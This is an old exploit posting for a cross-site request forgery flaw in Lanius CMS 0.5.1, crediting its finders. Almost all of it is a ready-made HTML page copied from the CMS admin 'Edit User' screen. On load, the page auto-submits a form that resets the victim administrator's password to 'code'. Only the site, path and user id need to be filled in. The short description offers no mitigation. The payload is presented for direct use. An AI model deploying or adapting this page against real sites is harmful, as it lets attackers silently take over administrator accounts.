laniuscms-xsrf.txt
Posted on 10 February 2009
[-]Lanius CMS 0.5.1 CSRF vulnerability [-]exploit found by d14l and marcoj [-]greetz to soul,stefo,sp1r1t,invisible,kisobran and others [-] lanius CMS suffers from csrf vulnerabilities which allows attacker change admins password it is only important to change in source [site],[path] and [id] of victim and it will change victims password to "code" //////////////////////////////////////////////////CODE/////////////////////////////////////////////////////////////////////////// <script type="text/javascript" language="javascript" src="http://[site]/[path]/admin/includes/js/anthill.js"></script> <script type="text/javascript" language="javascript"> /* <![CDATA[ */ var lcms_data_form='adminform'; /* ]]> */ </script> <script type="text/javascript" language="javascript" src="includes/js/progressbar.js"></script> <script type="text/javascript" language="javascript" src="includes/js/passwordquality.js"></script> <link href="includes/css/progressbar.css" rel="stylesheet" type="text/css" media="all" /> <script type="text/javascript" language="javascript"> /* <![CDATA[ */ function _init_pwd_box() { initQualityMeter("user_password", "the_password", "Password quality: "); } pb_addEvent(window, "load", _init_pwd_box); /* ]]> */ </script> <script type="text/javascript" language="javascript"> /* <![CDATA[ */ var dil_folder = 'media/forum/avatars/'; var dil_default_src = 'media/forum/avatars/default.png'; function changeImage(srcObj,srcListName) { var im=document.getElementById("image_"+srcListName); var obj_v = srcObj.value; if (obj_v==null || obj_v=="") im.src = dil_default_src; else im.src = dil_folder+obj_v; } /* ]]> */ </script> <script type="text/javascript" language="javascript" src="components/forum/forum.js"></script> <script type="text/javascript" language="javascript"> /* <![CDATA[ */ function ui_lcms_st(pressbutton){ var frm=document.getElementById(lcms_data_form); if ( pressbutton == 'save' ) { var frm=document.getElementById('adminform'); field_value=frm.user_name.value; if (!field_value.length) { alert("Invalid value for Display name");return false; } field_value=frm.user_user.value; if (!field_value.length) { alert("Invalid value for Username");return false; } field_value=frm.user_email.value; if (!field_value.length) { alert("Invalid value for Email");return false; } } if ( pressbutton == 'cancel' ) { document.location.href=frm.action; return;} lcms_st(pressbutton); } /* ]]> */ </script> <script language="javascript" type="text/javascript"> var cmThemeDefaultBase = "admin/templates/default/images/"; </script> <script language="javascript" src="admin/templates/default/js/JSCookMenu.js" type="text/javascript"></script> <script language="javascript" src="index2.php?option=service&service=admin_menu&no_html=1&lang=en" type="text/javascript"></script> <script language="javascript" src="admin/templates/default/js/ThemeDefault/theme.js" type="text/javascript"></script> <link rel="stylesheet" href="admin/templates/default/js/ThemeDefault/theme.css" type="text/css" /><script language="javascript" src="admin/includes/js/dhtml.js" type="text/javascript"></script> <link rel="stylesheet" href="admin/templates/default/css/template.style.css" type="text/css" /> </head> <body> <body onload="ui_lcms_st('save');"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="320" class="top-logo" > <img src="admin/templates/default/images/header.png" alt="Administration" /> </td> <td width="240" class="top-update" > <a class="dlinks" title="Information about the latest version available, click to start the automatic update wizard" href="http://[site]/[path]/admin.php?com_option=system&option=autoupdate"><img border="0" src="http://www.laniuscms.org/services/status.png.php?v=0.5.1+r843" alt="Information about the latest version available, click to start the automatic update wizard" /></a> </td> <td align="right" class="top-logo" ><a href="index.php?option=login&task=logout" class="wlink" style="color: #e5e5e5"><img src="admin/templates/default/images/logout.png" border="0" alt="" /> Logout</a> </td> </tr> </table> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr class="toolmenu"> <td height="25"><div id="myMenuID" style="margin-left: 15px;"></div> <script language="javascript" type="text/javascript"> cmDraw ("myMenuID", myMenu, "hbr", cmThemeDefault, "ThemeDefault"); </script> <noscript><big>Your browser does not have javascript support, please enable it or either ask the administrator to enable a non-javascript menu</big></noscript></td> <td align="right"> <table class="hotlinks" border="0" cellspacing="0" cellpadding="2"> <tr><td> </td> </tr> </table> </td> <td align="right"></td> </tr> </table> <table width="100%" cellspacing="0" cellpadding="0"> <tr><td class="pathway-backend"><a title="Home page" href="http://[site]/[path]/admin.php" class="pathway"><img src="media/common/home.png" border="0" alt="Home page" /></a> Edit User <a title="Permanent link to this page" href="http://[site]/[path]/admin.php?com_option=user&task=edit&cid[]=[id]"><img src="media/common/box.png" border="0" alt="Permanent link to this page" /></a> </td> </tr> </table> <div class="dka_component"> <form id='adminform' name='adminform' method='post' action='http://[site]/[path]/admin.php?com_option=user' enctype='multipart/form-data'><div class="toolbar-header"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" /> <input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" /> <noscript> <p> If you have no javascript support, then ignore the above buttons and use this combo box.</p> <select name="alt_task[]"> <option value="">--</option> <option value="save">Save</option> <option value="cancel">Cancel</option> </select> <input type="submit" value="Go" /></noscript> </div><table border='0' cellpadding='0' cellspacing='0' width='100%' align='center'> <tr><td colspan='2' class="" ><input type="hidden" name="task" value="" /></td></tr> <tr><td colspan='2' class="header1" >Edit User</td></tr> <tr><td colspan="2"> <table width="100%" border="0" cellpadding="5" cellspacing="2" > <tr><td class="tabtitle">Edit User </td></tr><tr> <td class="tabbody"> <table width="90%" border="0" align="center" cellpadding="2" cellspacing="0"> <tr><td width="200"> </td><td> </td></tr> <tr><td colspan='2' class="" ><input type="hidden" name="user_id" value="244" /></td></tr> <tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Display name</td><td class="" ><input type="text" name="user_name" value="Webaaaaamaster" class="tf" size="40" /></td></tr> <tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Username</td><td class="" ><input type="text" name="user_user" value="admin" class="tf" size="40" /></td></tr> <tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Email</td><td class="" ><input type="text" name="user_email" value="webmaster@example.com" class="tf" size="40" /></td></tr> <tr><td class="" valign="top" nowrap="nowrap"> Language</td><td class="" ><select name="user_lang" class="tf"> <option value="" selected="selected" style="color: grey">-- Auto --</option> <option value="en">English</option> </select> </td></tr> <tr><td class="" valign="top" nowrap="nowrap"> User timezone</td><td class="" ><select name="user_tz" class="tf"> <option value="">-- Auto --</option> <option value="Africa/Abidjan">Africa/Abidjan</option> </select> </td></tr> <tr><td class="" valign="top" nowrap="nowrap"> Users Group</td><td class="" ><select name="user_gid" class="tf"> <option value="1">Registered</option> <option value="2">Editor</option> <option value="3">Publisher</option> <option value="4">Manager</option> <option value="5" selected="selected" style="color: grey">Administrator</option> </select> </td></tr> <tr><td colspan='2' class="" > </td></tr> <tr><td colspan='2' class="" > Leave the password field empty to preserve the previous password</td></tr> <tr><td class="" valign="top" nowrap="nowrap"> Password</td><td class="" ><input type="password" name='user_password' value='code' class="tf" size='40' onkeypress="updateQualityMeter(this)" /></td></tr> <tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><div id="the_password"></div></td></tr> <tr><td class="" valign="top" nowrap="nowrap"> Password confirmation</td><td class="" ><input type="password" name='user_password1' value='code' class="tf" size='40' /></td></tr> <tr><td colspan='2' class="" > </td></tr> <tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><label for="user_message_allow"> <input id="user_message_allow" name="user_message_allow" type="checkbox" />Allow other users to send messages to me (email will not be visible to them)</label><br /><label for="user_message_show_email"> <input id="user_message_html" name="user_message_html" type="checkbox" />Can receive HTML emails</label><br /><label for="user_message_attach"> <input id="user_message_attach" name="user_message_attach" type="checkbox" checked="checked"/>Receive also attachments</label><br /> <div class="dk_content"><h3>Avatar</h3><table border="0" cellspacing="0" cellpadding="0"><tr> <td><select name='user_avatar' class="tf" size='6' onchange='javascript:changeImage(this,"user_avatar")' > <option value="default.png" selected='selected' >< Current ></option> <option value="abstract8.png" >abstract8.png</option> </select></td> <td><img src="media/forum/avatars/default.png" id="image_user_avatar" name="image_user_avatar" border="2" alt="" /></td> </tr></table> <script type="text/javascript" language="javascript"> /* <![CDATA[ */ var tmpi_0 = new Image(); tmpi_0.src="media/forum/avatars/default.png"; /* ]]> */ </script> </div> <div class="dk_content"><input type="hidden" name="MAX_FILE_SIZE" value="614400" /> <input id="user_uploaded_avatar" name="user_uploaded_avatar" type="file" class="dk_inputbox" value="" size="45" /></div> <div class="dk_content"> <h3>Forum user statistics</h3>Posts: 1<br />Member since 09 February 2009 19:10</div> <p><h3>Forum user information</h3></p> <div class="dk_content">Location: <input class="dk_inputbox" type="text" name="user_location" size="40" maxlength="100" value="" /></div> <div class="dk_content">Website: <input class="dk_inputbox" type="text" name="user_url" size="40" value="" /></div> <table border="0"> <tr> <td valign="top"> </td> <td><a href='javascript:DoPrompt("user_information", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_information", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_information", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a> </td> </tr> <tr> <td valign="top">User provided information (max 1024 characters)</td> <td><textarea name="user_information" cols="30" rows="16" class="dk_inputbox" id="user_information"></textarea></td> </tr> <tr> <td valign="top"> </td> <td><a href='javascript:DoPrompt("user_signature", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_signature", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_signature", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a> </td> </tr> <tr> <td valign="top">Custom signature (max 300 characters)</td> <td><textarea name="user_signature" cols="30" rows="3" class="dk_inputbox" id="user_signature"></textarea></td> </tr> </table></td></tr> </table></td></tr></table> </td></tr> </table><br /><div class="toolbar-footer" style="text-align: left"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" /> <input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" /> <noscript> <p> If you have no javascript support, then ignore the above buttons and use this combo box.</p> <select name="alt_task[]"> <option value="">--</option> <option value="save">Save</option> <option value="cancel">Cancel</option> </select> <input type="submit" value="Go" /></noscript> </div></form></div> <div class="footer"> <div title="Donate now EUR 10 for the Lanius CMS Project" align="center"> <form id="_xclick" name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank"> <input name="cmd" value="_xclick" type="hidden" /> <input name="business" value="donations@laniuscms.org" type="hidden" /> <input name="no_shipping" value="0" type="hidden" /> <input name="lc" value="EN" type="hidden" /> <input name="item_name" value="Lanius CMS Project donation from website" type="hidden" /> <input name="currency_code" value="EUR" type="hidden" /> <input name="amount" value="10.00" type="hidden" /> Support the Lanius CMS Project with a small donation: <input src="media/common/donate.png" name="submit" alt="Lanius CMS Project donation from website" type="image" /> </form> </div> </div> </body> </html> ////////////////////////////////////////////end of code////////////////////////////////////////////////
